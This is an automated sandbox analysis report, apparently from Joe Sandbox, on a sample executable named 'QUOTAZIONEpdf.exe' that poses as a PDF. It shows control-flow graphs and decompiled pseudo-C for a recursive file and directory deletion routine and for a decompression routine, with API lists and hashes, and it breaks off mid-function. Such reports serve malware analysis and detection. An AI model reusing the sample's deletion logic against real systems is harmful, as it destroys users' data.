                control_flow_graph 248 4053aa-4053c5 call 405659 251 4053c7-4053d9 DeleteFileA 248->251 252 4053de-4053e8 248->252 253 405572-405575 251->253 254 4053ea-4053ec 252->254 255 4053fc-40540a call 405a85 252->255 256 4053f2-4053f6 254->256 257 40551d-405523 254->257 261 405419-40541a call 4055bf 255->261 262 40540c-405417 lstrcatA 255->262 256->255 256->257 257->253 259 405525-405528 257->259 263 405532-40553a call 405d7c 259->263 264 40552a-405530 259->264 265 40541f-405422 261->265 262->265 263->253 272 40553c-405551 call 405578 call 40573d RemoveDirectoryA 263->272 264->253 268 405424-40542b 265->268 269 40542d-405433 lstrcatA 265->269 268->269 271 405438-405456 lstrlenA FindFirstFileA 268->271 269->271 273 405513-405517 271->273 274 40545c-405473 call 4055a3 271->274 284 405553-405557 272->284 285 40556a-40556d call 404e23 272->285 273->257 276 405519 273->276 282 405475-405479 274->282 283 40547e-405481 274->283 276->257 282->283 286 40547b 282->286 287 405483-405488 283->287 288 405494-4054a2 call 405a85 283->288 284->264 290 405559-405568 call 404e23 call 4057d3 284->290 285->253 286->283 292 4054f2-405504 FindNextFileA 287->292 293 40548a-40548c 287->293 298 4054a4-4054ac 288->298 299 4054b9-4054c8 call 40573d DeleteFileA 288->299 290->253 292->274 296 40550a-40550d FindClose 292->296 293->288 297 40548e-405492 293->297 296->273 297->288 297->292 298->292 301 4054ae-4054b7 call 4053aa 298->301 308 4054ea-4054ed call 404e23 299->308 309 4054ca-4054ce 299->309 301->292 308->292 311 4054d0-4054e0 call 404e23 call 4057d3 309->311 312 4054e2-4054e8 309->312 311->292 312->292
                C-Code - Quality: 94%
                			E004053AA(void* __ebx, void* __eflags, void* _a4, signed int _a8) {
				signed int _v8;
				signed int _v12;
				struct _WIN32_FIND_DATAA _v332;
				signed int _t37;
				char* _t49;
				signed int _t52;
				signed int _t55;
				signed int _t61;
				signed int _t63;
				void* _t65;
				signed int _t68;
				CHAR* _t70;
				CHAR* _t72;
				char* _t75;

				_t72 = _a4;
				_t37 = E00405659(__eflags, _t72);
				_v12 = _t37;
				if((_a8 & 0x00000008) != 0) {
					_t63 = DeleteFileA(_t72); // executed
					asm("sbb eax, eax");
					_t65 =  ~_t63 + 1;
					 *0x423f28 =  *0x423f28 + _t65;
					return _t65;
				}
				_t68 = _a8 & 0x00000001;
				__eflags = _t68;
				_v8 = _t68;
				if(_t68 == 0) {
					L5:
					E00405A85(0x4214a0, _t72);
					__eflags = _t68;
					if(_t68 == 0) {
						E004055BF(_t72);
					} else {
						lstrcatA(0x4214a0, "\*.*");
					}
					__eflags =  *_t72;
					if( *_t72 != 0) {
						L10:
						lstrcatA(_t72, 0x40900c);
						L11:
						_t70 =  &(_t72[lstrlenA(_t72)]);
						_t37 = FindFirstFileA(0x4214a0,  &_v332);
						__eflags = _t37 - 0xffffffff;
						_a4 = _t37;
						if(_t37 == 0xffffffff) {
							L29:
							__eflags = _v8;
							if(_v8 != 0) {
								_t31 = _t70 - 1;
								 *_t31 =  *(_t70 - 1) & 0x00000000;
								__eflags =  *_t31;
							}
							goto L31;
						} else {
							goto L12;
						}
						do {
							L12:
							_t75 =  &(_v332.cFileName);
							_t49 = E004055A3( &(_v332.cFileName), 0x3f);
							__eflags =  *_t49;
							if( *_t49 != 0) {
								__eflags = _v332.cAlternateFileName;
								if(_v332.cAlternateFileName != 0) {
									_t75 =  &(_v332.cAlternateFileName);
								}
							}
							__eflags =  *_t75 - 0x2e;
							if( *_t75 != 0x2e) {
								L19:
								E00405A85(_t70, _t75);
								__eflags = _v332.dwFileAttributes & 0x00000010;
								if((_v332.dwFileAttributes & 0x00000010) == 0) {
									E0040573D(_t72);
									_t52 = DeleteFileA(_t72);
									__eflags = _t52;
									if(_t52 != 0) {
										E00404E23(0xfffffff2, _t72);
									} else {
										__eflags = _a8 & 0x00000004;
										if((_a8 & 0x00000004) == 0) {
											 *0x423f28 =  *0x423f28 + 1;
										} else {
											E00404E23(0xfffffff1, _t72);
											_push(0);
											_push(_t72);
											E004057D3();
										}
									}
								} else {
									__eflags = (_a8 & 0x00000003) - 3;
									if(__eflags == 0) {
										E004053AA(_t70, __eflags, _t72, _a8);
									}
								}
								goto L27;
							}
							_t61 =  *((intOrPtr*)(_t75 + 1));
							__eflags = _t61;
							if(_t61 == 0) {
								goto L27;
							}
							__eflags = _t61 - 0x2e;
							if(_t61 != 0x2e) {
								goto L19;
							}
							__eflags =  *((char*)(_t75 + 2));
							if( *((char*)(_t75 + 2)) == 0) {
								goto L27;
							}
							goto L19;
							L27:
							_t55 = FindNextFileA(_a4,  &_v332);
							__eflags = _t55;
						} while (_t55 != 0);
						_t37 = FindClose(_a4);
						goto L29;
					}
					__eflags =  *0x4214a0 - 0x5c;
					if( *0x4214a0 != 0x5c) {
						goto L11;
					}
					goto L10;
				} else {
					__eflags = _t37;
					if(_t37 == 0) {
						L31:
						__eflags = _v8;
						if(_v8 == 0) {
							L39:
							return _t37;
						}
						__eflags = _v12;
						if(_v12 != 0) {
							_t37 = E00405D7C(_t72);
							__eflags = _t37;
							if(_t37 == 0) {
								goto L39;
							}
							E00405578(_t72);
							E0040573D(_t72);
							_t37 = RemoveDirectoryA(_t72);
							__eflags = _t37;
							if(_t37 != 0) {
								return E00404E23(0xffffffe5, _t72);
							}
							__eflags = _a8 & 0x00000004;
							if((_a8 & 0x00000004) == 0) {
								goto L33;
							}
							E00404E23(0xfffffff1, _t72);
							_push(0);
							_push(_t72);
							return E004057D3();
						}
						L33:
						 *0x423f28 =  *0x423f28 + 1;
						return _t37;
					}
					__eflags = _a8 & 0x00000002;
					if((_a8 & 0x00000002) == 0) {
						goto L31;
					}
					goto L5;
				}
			}

















                0x004053b5
                0x004053b9
                0x004053c2
                0x004053c5
                0x004053c8
                0x004053d0
                0x004053d2
                0x004053d3
                0x00000000
                0x004053d3
                0x004053e2
                0x004053e2
                0x004053e5
                0x004053e8
                0x004053fc
                0x00405403
                0x00405408
                0x0040540a
                0x0040541a
                0x0040540c
                0x00405412
                0x00405412
                0x0040541f
                0x00405422
                0x0040542d
                0x00405433
                0x00405438
                0x00405448
                0x0040544a
                0x00405450
                0x00405453
                0x00405456
                0x00405513
                0x00405513
                0x00405517
                0x00405519
                0x00405519
                0x00405519
                0x00405519
                0x00000000
                0x00000000
                0x00000000
                0x00000000
                0x0040545c
                0x0040545c
                0x00405465
                0x0040546b
                0x00405470
                0x00405473
                0x00405475
                0x00405479
                0x0040547b
                0x0040547b
                0x00405479
                0x0040547e
                0x00405481
                0x00405494
                0x00405496
                0x0040549b
                0x004054a2
                0x004054ba
                0x004054c0
                0x004054c6
                0x004054c8
                0x004054ed
                0x004054ca
                0x004054ca
                0x004054ce
                0x004054e2
                0x004054d0
                0x004054d3
                0x004054d8
                0x004054da
                0x004054db
                0x004054db
                0x004054ce
                0x004054a4
                0x004054aa
                0x004054ac
                0x004054b2
                0x004054b2
                0x004054ac
                0x00000000
                0x004054a2
                0x00405483
                0x00405486
                0x00405488
                0x00000000
                0x00000000
                0x0040548a
                0x0040548c
                0x00000000
                0x00000000
                0x0040548e
                0x00405492
                0x00000000
                0x00000000
                0x00000000
                0x004054f2
                0x004054fc
                0x00405502
                0x00405502
                0x0040550d
                0x00000000
                0x0040550d
                0x00405424
                0x0040542b
                0x00000000
                0x00000000
                0x00000000
                0x004053ea
                0x004053ea
                0x004053ec
                0x0040551d
                0x00405520
                0x00405523
                0x00405575
                0x00405575
                0x00405575
                0x00405525
                0x00405528
                0x00405533
                0x00405538
                0x0040553a
                0x00000000
                0x00000000
                0x0040553d
                0x00405543
                0x00405549
                0x0040554f
                0x00405551
                0x00000000
                0x0040556d
                0x00405553
                0x00405557
                0x00000000
                0x00000000
                0x0040555c
                0x00405561
                0x00405562
                0x00000000
                0x00405563
                0x0040552a
                0x0040552a
                0x00000000
                0x0040552a
                0x004053f2
                0x004053f6
                0x00000000
                0x00000000
                0x00000000
                0x004053f6

                APIs
                • DeleteFileA.KERNELBASE(?,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 004053C8
                • lstrcatA.KERNEL32(004214A0,\*.*,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405412
                • lstrcatA.KERNEL32(?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405433
                • lstrlenA.KERNEL32(?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 00405439
                • FindFirstFileA.KERNEL32(004214A0,?,?,?,0040900C,?,004214A0,?,00000000,?,"C:\Users\user\Desktop\QUOTAZIONEpdf.exe" ,74E5F560), ref: 0040544A
                • FindNextFileA.KERNEL32(?,00000010,000000F2,?), ref: 004054FC
                • FindClose.KERNEL32(?), ref: 0040550D
                Strings
                • C:\Users\user\AppData\Local\Temp\, xrefs: 004053AA
                • \*.*, xrefs: 0040540C
                • "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" , xrefs: 004053B4
                Memory Dump Source
                • Source File: 00000001.00000002.300595966.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                • Associated: 00000001.00000002.300589722.0000000000400000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300601525.0000000000407000.00000002.00020000.sdmp Download File
                • Associated: 00000001.00000002.300605629.0000000000409000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300623029.0000000000422000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300631122.0000000000429000.00000004.00020000.sdmp Download File
                • Associated: 00000001.00000002.300636246.000000000042C000.00000002.00020000.sdmp Download File
                Joe Sandbox IDA Plugin
                • Snapshot File: hcaresult_1_2_400000_QUOTAZIONEpdf.jbxd
                Similarity
                • API ID: FileFind$lstrcat$CloseDeleteFirstNextlstrlen
                • String ID: "C:\Users\user\Desktop\QUOTAZIONEpdf.exe" $C:\Users\user\AppData\Local\Temp\$\*.*
                • API String ID: 2035342205-4182517818
                • Opcode ID: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                • Instruction ID: 0322a8429cd808b8a7b2d486838befd4e4df4ca31dedcf7a9ac14dfd5c4716bd
                • Opcode Fuzzy Hash: 8a983a7928c03a7771966375b38950468f27bd10c21c4b06277df6b82eeec209
                • Instruction Fuzzy Hash: 2851CE30904A58BACB21AB219C85BFF3A78DF42719F14817BF901751D2CB7C4982DE6E
                Uniqueness

                Uniqueness Score: -1.00%

                Function 0040604C, Relevance: 5.4, APIs: 4, Instructions: 382COMMONCrypto
                Download Yara Rule

                Control-flow Graph

                • Executed
                • Not Executed
                control_flow_graph 520 40604c-406051 521 4060c2-4060e0 520->521 522 406053-406082 520->522 523 4066b8-4066cd 521->523 524 406084-406087 522->524 525 406089-40608d 522->525 529 4066e7-4066fd 523->529 530 4066cf-4066e5 523->530 526 406099-40609c 524->526 527 406095 525->527 528 40608f-406093 525->528 532 4060ba-4060bd 526->532 533 40609e-4060a7 526->533 527->526 528->526 531 406700-406707 529->531 530->531 534 406709-40670d 531->534 535 40672e-40673a 531->535 538 40628f-4062ad 532->538 536 4060a9 533->536 537 4060ac-4060b8 533->537 539 406713-40672b 534->539 540 4068bc-4068c6 534->540 545 405ed0-405ed9 535->545 536->537 544 406122-406150 537->544 542 4062c5-4062d7 538->542 543 4062af-4062c3 538->543 539->535 548 4068d2-4068e5 540->548 549 4062da-4062e4 542->549 543->549 546 406152-40616a 544->546 547 40616c-406186 544->547 554 4068e7 545->554 555 405edf 545->555 550 406189-406193 546->550 547->550 551 4068ea-4068ee 548->551 552 4062e6 549->552 553 406287-40628d 549->553 557 406199 550->557 558 40610a-406110 550->558 570 40626c-406284 552->570 571 40686e-406878 552->571 553->538 556 40622b-406235 553->556 554->551 560 405ee6-405eea 555->560 561 406026-406047 555->561 562 405f8b-405f8f 555->562 563 405ffb-405fff 555->563 566 40687a-406884 556->566 567 40623b-406404 556->567 577 406856-406860 557->577 578 4060ef-406107 557->578 568 4061c3-4061c9 558->568 569 406116-40611c 558->569 560->548 575 405ef0-405efd 560->575 561->523 573 405f95-405fae 562->573 574 40683b-406845 562->574 564 406005-406019 563->564 565 40684a-406854 563->565 579 40601c-406024 564->579 565->548 566->548 567->545 581 406227 568->581 583 4061cb-4061e9 568->583 569->544 569->581 570->553 571->548 582 405fb1-405fb5 573->582 574->548 575->554 576 405f03-405f49 575->576 584 405f71-405f73 576->584 585 405f4b-405f4f 576->585 577->548 578->558 579->561 579->563 581->556 582->562 586 405fb7-405fbd 582->586 587 406201-406213 583->587 588 4061eb-4061ff 583->588 591 405f81-405f89 584->591 592 405f75-405f7f 584->592 589 405f51-405f54 GlobalFree 585->589 590 405f5a-405f68 GlobalAlloc 585->590 593 405fe7-405ff9 586->593 594 405fbf-405fc6 586->594 595 406216-406220 587->595 588->595 589->590 590->554 597 405f6e 590->597 591->582 592->591 592->592 593->579 598 405fd1-405fe1 GlobalAlloc 594->598 599 405fc8-405fcb GlobalFree 594->599 595->568 596 406222 595->596 601 406862-40686c 596->601 602 4061a8-4061c0 596->602 597->584 598->554 598->593 599->598 601->548 602->568
                C-Code - Quality: 98%
                			E0040604C() {
				unsigned short _t531;
				signed int _t532;
				void _t533;
				void* _t534;
				signed int _t535;
				signed int _t565;
				signed int _t568;
				signed int _t590;
				signed int* _t607;
				void* _t614;

				L0:
				while(1) {
					L0:
					if( *(_t614 - 0x40) != 0) {
						 *(_t614 - 0x34) = 1;
						 *(_t614 - 0x84) = 7;
						_t607 =  *(_t614 - 4) + 0x180 +  *(_t614 - 0x38) * 2;
						L132:
						 *(_t614 - 0x54) = _t607;
						L133:
						_t531 =  *_t607;
						_t590 = _t531 & 0x0000ffff;
						_t565 = ( *(_t614 - 0x10) >> 0xb) * _t590;
						if( *(_t614 - 0xc) >= _t565) {
							 *(_t614 - 0x10) =  *(_t614 - 0x10) - _t565;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) - _t565;
							 *(_t614 - 0x40) = 1;
							_t532 = _t531 - (_t531 >> 5);
							 *_t607 = _t532;
						} else {
							 *(_t614 - 0x10) = _t565;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
							 *_t607 = (0x800 - _t590 >> 5) + _t531;
						}
						if( *(_t614 - 0x10) >= 0x1000000) {
							L139:
							_t533 =  *(_t614 - 0x84);
							L140:
							 *(_t614 - 0x88) = _t533;
							goto L1;
						} else {
							L137:
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 5;
								goto L170;
							}
							 *(_t614 - 0x10) =  *(_t614 - 0x10) << 8;
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							goto L139;
						}
					} else {
						__eax =  *(__ebp - 0x5c) & 0x000000ff;
						__esi =  *(__ebp - 0x60);
						__esi =  *(__ebp - 0x60) &  *(__ebp - 0x18);
						__eax = ( *(__ebp - 0x5c) & 0x000000ff) >> 8;
						__ecx =  *(__ebp - 0x3c);
						__esi = ( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8;
						__ecx =  *(__ebp - 4);
						(( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2;
						__eax = (( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9;
						__eax = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						 *(__ebp - 0x58) = ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8) + ((( *(__ebp - 0x5c) & 0x000000ff) >> 8) + (( *(__ebp - 0x60) &  *(__ebp - 0x18)) << 8)) * 2 << 9) +  *(__ebp - 4) + 0xe6c;
						if( *(__ebp - 0x38) >= 4) {
							if( *(__ebp - 0x38) >= 0xa) {
								_t97 = __ebp - 0x38;
								 *_t97 =  *(__ebp - 0x38) - 6;
							} else {
								 *(__ebp - 0x38) =  *(__ebp - 0x38) - 3;
							}
						} else {
							 *(__ebp - 0x38) = 0;
						}
						if( *(__ebp - 0x34) == __edx) {
							__ebx = 0;
							__ebx = 1;
							L60:
							__eax =  *(__ebp - 0x58);
							__edx = __ebx + __ebx;
							__ecx =  *(__ebp - 0x10);
							__esi = __edx + __eax;
							__ecx =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edi = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								_t216 = __edx + 1; // 0x1
								__ebx = _t216;
								__cx = __ax >> 5;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edi;
								0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L59:
								if(__ebx >= 0x100) {
									goto L54;
								}
								goto L60;
							} else {
								L57:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xf;
									goto L170;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t202 = __ebp - 0x70;
								 *_t202 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L59;
							}
						} else {
							__eax =  *(__ebp - 0x14);
							__eax =  *(__ebp - 0x14) -  *(__ebp - 0x2c);
							if(__eax >=  *(__ebp - 0x74)) {
								__eax = __eax +  *(__ebp - 0x74);
							}
							__ecx =  *(__ebp - 8);
							__ebx = 0;
							__ebx = 1;
							__al =  *((intOrPtr*)(__eax + __ecx));
							 *(__ebp - 0x5b) =  *((intOrPtr*)(__eax + __ecx));
							L40:
							__eax =  *(__ebp - 0x5b) & 0x000000ff;
							 *(__ebp - 0x5b) =  *(__ebp - 0x5b) << 1;
							__ecx =  *(__ebp - 0x58);
							__eax = ( *(__ebp - 0x5b) & 0x000000ff) >> 7;
							 *(__ebp - 0x48) = __eax;
							__eax = __eax + 1;
							__eax = __eax << 8;
							__eax = __eax + __ebx;
							__esi =  *(__ebp - 0x58) + __eax * 2;
							 *(__ebp - 0x10) =  *(__ebp - 0x10) >> 0xb;
							__ax =  *__esi;
							 *(__ebp - 0x54) = __esi;
							__edx = __ax & 0x0000ffff;
							__ecx = ( *(__ebp - 0x10) >> 0xb) * __edx;
							if( *(__ebp - 0xc) >= __ecx) {
								 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
								__cx = __ax;
								 *(__ebp - 0x40) = 1;
								__cx = __ax >> 5;
								__ebx = __ebx + __ebx + 1;
								 *__esi = __ax;
							} else {
								 *(__ebp - 0x40) =  *(__ebp - 0x40) & 0x00000000;
								 *(__ebp - 0x10) = __ecx;
								0x800 = 0x800 - __edx;
								0x800 - __edx >> 5 = (0x800 - __edx >> 5) + __eax;
								__ebx = __ebx + __ebx;
								 *__esi = __cx;
							}
							 *(__ebp - 0x44) = __ebx;
							if( *(__ebp - 0x10) >= 0x1000000) {
								L38:
								__eax =  *(__ebp - 0x40);
								if( *(__ebp - 0x48) !=  *(__ebp - 0x40)) {
									while(1) {
										if(__ebx >= 0x100) {
											break;
										}
										__eax =  *(__ebp - 0x58);
										__edx = __ebx + __ebx;
										__ecx =  *(__ebp - 0x10);
										__esi = __edx + __eax;
										__ecx =  *(__ebp - 0x10) >> 0xb;
										__ax =  *__esi;
										 *(__ebp - 0x54) = __esi;
										__edi = __ax & 0x0000ffff;
										__ecx = ( *(__ebp - 0x10) >> 0xb) * __edi;
										if( *(__ebp - 0xc) >= __ecx) {
											 *(__ebp - 0x10) =  *(__ebp - 0x10) - __ecx;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) - __ecx;
											__cx = __ax;
											_t169 = __edx + 1; // 0x1
											__ebx = _t169;
											__cx = __ax >> 5;
											 *__esi = __ax;
										} else {
											 *(__ebp - 0x10) = __ecx;
											0x800 = 0x800 - __edi;
											0x800 - __edi >> 5 = (0x800 - __edi >> 5) + __eax;
											__ebx = __ebx + __ebx;
											 *__esi = __cx;
										}
										 *(__ebp - 0x44) = __ebx;
										if( *(__ebp - 0x10) < 0x1000000) {
											L45:
											if( *(__ebp - 0x6c) == 0) {
												 *(__ebp - 0x88) = 0xe;
												goto L170;
											}
											__ecx =  *(__ebp - 0x70);
											__eax =  *(__ebp - 0xc);
											 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
											__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
											 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
											 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
											_t155 = __ebp - 0x70;
											 *_t155 =  *(__ebp - 0x70) + 1;
											 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
										}
									}
									L53:
									_t172 = __ebp - 0x34;
									 *_t172 =  *(__ebp - 0x34) & 0x00000000;
									L54:
									__al =  *(__ebp - 0x44);
									 *(__ebp - 0x5c) =  *(__ebp - 0x44);
									L55:
									if( *(__ebp - 0x64) == 0) {
										 *(__ebp - 0x88) = 0x1a;
										goto L170;
									}
									__ecx =  *(__ebp - 0x68);
									__al =  *(__ebp - 0x5c);
									__edx =  *(__ebp - 8);
									 *(__ebp - 0x60) =  *(__ebp - 0x60) + 1;
									 *(__ebp - 0x68) =  *(__ebp - 0x68) + 1;
									 *(__ebp - 0x64) =  *(__ebp - 0x64) - 1;
									 *( *(__ebp - 0x68)) = __al;
									__ecx =  *(__ebp - 0x14);
									 *(__ecx +  *(__ebp - 8)) = __al;
									__eax = __ecx + 1;
									__edx = 0;
									_t191 = __eax %  *(__ebp - 0x74);
									__eax = __eax /  *(__ebp - 0x74);
									__edx = _t191;
									L79:
									 *(__ebp - 0x14) = __edx;
									L80:
									 *(__ebp - 0x88) = 2;
									goto L1;
								}
								if(__ebx >= 0x100) {
									goto L53;
								}
								goto L40;
							} else {
								L36:
								if( *(__ebp - 0x6c) == 0) {
									 *(__ebp - 0x88) = 0xd;
									L170:
									_t568 = 0x22;
									memcpy( *(_t614 - 0x90), _t614 - 0x88, _t568 << 2);
									_t535 = 0;
									L172:
									return _t535;
								}
								__ecx =  *(__ebp - 0x70);
								__eax =  *(__ebp - 0xc);
								 *(__ebp - 0x10) =  *(__ebp - 0x10) << 8;
								__ecx =  *( *(__ebp - 0x70)) & 0x000000ff;
								 *(__ebp - 0x6c) =  *(__ebp - 0x6c) - 1;
								 *(__ebp - 0xc) << 8 =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								_t121 = __ebp - 0x70;
								 *_t121 =  *(__ebp - 0x70) + 1;
								 *(__ebp - 0xc) =  *(__ebp - 0xc) << 0x00000008 |  *( *(__ebp - 0x70)) & 0x000000ff;
								goto L38;
							}
						}
					}
					L1:
					_t534 =  *(_t614 - 0x88);
					if(_t534 > 0x1c) {
						L171:
						_t535 = _t534 | 0xffffffff;
						goto L172;
					}
					switch( *((intOrPtr*)(_t534 * 4 +  &M004068EF))) {
						case 0:
							if( *(_t614 - 0x6c) == 0) {
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t534 =  *( *(_t614 - 0x70));
							if(_t534 > 0xe1) {
								goto L171;
							}
							_t538 = _t534 & 0x000000ff;
							_push(0x2d);
							asm("cdq");
							_pop(_t570);
							_push(9);
							_pop(_t571);
							_t610 = _t538 / _t570;
							_t540 = _t538 % _t570 & 0x000000ff;
							asm("cdq");
							_t605 = _t540 % _t571 & 0x000000ff;
							 *(_t614 - 0x3c) = _t605;
							 *(_t614 - 0x1c) = (1 << _t610) - 1;
							 *((intOrPtr*)(_t614 - 0x18)) = (1 << _t540 / _t571) - 1;
							_t613 = (0x300 << _t605 + _t610) + 0x736;
							if(0x600 ==  *((intOrPtr*)(_t614 - 0x78))) {
								L10:
								if(_t613 == 0) {
									L12:
									 *(_t614 - 0x48) =  *(_t614 - 0x48) & 0x00000000;
									 *(_t614 - 0x40) =  *(_t614 - 0x40) & 0x00000000;
									goto L15;
								} else {
									goto L11;
								}
								do {
									L11:
									_t613 = _t613 - 1;
									 *((short*)( *(_t614 - 4) + _t613 * 2)) = 0x400;
								} while (_t613 != 0);
								goto L12;
							}
							if( *(_t614 - 4) != 0) {
								GlobalFree( *(_t614 - 4));
							}
							_t534 = GlobalAlloc(0x40, 0x600); // executed
							 *(_t614 - 4) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								 *((intOrPtr*)(_t614 - 0x78)) = 0x600;
								goto L10;
							}
						case 1:
							L13:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 1;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							 *(_t614 - 0x40) =  *(_t614 - 0x40) | ( *( *(_t614 - 0x70)) & 0x000000ff) <<  *(_t614 - 0x48) << 0x00000003;
							 *(_t614 - 0x70) =  &(( *(_t614 - 0x70))[1]);
							_t45 = _t614 - 0x48;
							 *_t45 =  *(_t614 - 0x48) + 1;
							__eflags =  *_t45;
							L15:
							if( *(_t614 - 0x48) < 4) {
								goto L13;
							}
							_t546 =  *(_t614 - 0x40);
							if(_t546 ==  *(_t614 - 0x74)) {
								L20:
								 *(_t614 - 0x48) = 5;
								 *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) =  *( *(_t614 - 8) +  *(_t614 - 0x74) - 1) & 0x00000000;
								goto L23;
							}
							 *(_t614 - 0x74) = _t546;
							if( *(_t614 - 8) != 0) {
								GlobalFree( *(_t614 - 8));
							}
							_t534 = GlobalAlloc(0x40,  *(_t614 - 0x40)); // executed
							 *(_t614 - 8) = _t534;
							if(_t534 == 0) {
								goto L171;
							} else {
								goto L20;
							}
						case 2:
							L24:
							_t553 =  *(_t614 - 0x60) &  *(_t614 - 0x1c);
							 *(_t614 - 0x84) = 6;
							 *(_t614 - 0x4c) = _t553;
							_t607 =  *(_t614 - 4) + (( *(_t614 - 0x38) << 4) + _t553) * 2;
							goto L132;
						case 3:
							L21:
							__eflags =  *(_t614 - 0x6c);
							if( *(_t614 - 0x6c) == 0) {
								 *(_t614 - 0x88) = 3;
								goto L170;
							}
							 *(_t614 - 0x6c) =  *(_t614 - 0x6c) - 1;
							_t67 = _t614 - 0x70;
							 *_t67 =  &(( *(_t614 - 0x70))[1]);
							__eflags =  *_t67;
							 *(_t614 - 0xc) =  *(_t614 - 0xc) << 0x00000008 |  *( *(_t614 - 0x70)) & 0x000000ff;
							L23:
							 *(_t614 - 0x48) =  *(_t614 - 0x48) - 1;
							if( *(_t614 - 0x48) != 0) {
								goto L21;
							}
							goto L24;
						case 4:
							goto L133;
						case 5:
							goto L137;
						case 6:
							goto L0;
						case 7:
							__eflags =  *(__ebp - 0x40) - 1;
							if( *(__ebp - 0x40) != 1) {
								__eax =  *(__ebp - 0x24);
								 *(__ebp - 0x80) = 0x16;
								 *(__ebp - 0x20) =  *(__ebp - 0x24);
								__eax =  *(__ebp - 0x28);
								 *(__ebp - 0x24) =  *(__ebp - 0x28);
								__eax =  *(__ebp - 0x2c);
								 *(__ebp - 0x28) =  *(__ebp - 0x2c);
								__eax = 0;
								__eflags =  *(__ebp - 0x38) - 7;
								0 | __eflags >= 0x00000000 = (__eflags >= 0) - 1;
								__al = __al & 0x000000fd;
								__eax = (__eflags >= 0) - 1 + 0xa;
								 *(__ebp - 0x38) = (__eflags >= 0) - 1 + 0xa;
								__eax =  *(__ebp - 4);
								__eax =  *(__ebp - 4) + 0x664;
								__eflags = __eax;
								 *(__ebp - 0x58) = __eax;
								goto L68;
							}
							__eax =  *(__ebp - 4);
							__ecx =  *(__ebp - 0x38);
							 *(__ebp - 0x84) = 8;
